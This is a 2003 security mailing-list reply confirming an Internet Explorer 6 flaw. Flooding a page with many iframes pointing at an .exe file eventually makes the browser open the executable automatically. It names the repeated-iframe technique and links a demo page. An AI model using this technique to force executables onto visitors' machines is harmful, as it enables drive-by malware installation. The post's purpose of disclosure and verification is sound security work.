Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! - UPDATED

From: http-equivat_private
Date: Thu May 15 2003 - 14:05:54 PDT

    Marek,

    Further to my confirmation of seeing this in the past as detailed
    below, I am today delighted to inform you that I can reconfirm that
    it functions precisely as you describe:

    1. Definitely processor related as after 10 minutes of bogging down
    the machine, BANG ! it automatically opened the .exe

    2.  Thereon after, all following .exe's are also automatically opened

    Tested on the following page which is nothing more than a sh!tload of:

    <iframe src="fooware.exe">'s

    Harmless .exe

    http://www.malware.com/forceframe.html

    Note: may of course be different on other machines [i.e. processor
    power...increase amount of frame 'suppose]

    Well Done ! It's a beauty !

    ======
    I had sent this to bugtraq when you initially posted it, confirming
    having seen it in the past as well. Will try your html file and see
    if can get it up and running again.

    Forwarded From: "http-equivat_private"

    --
    http://www.malware.com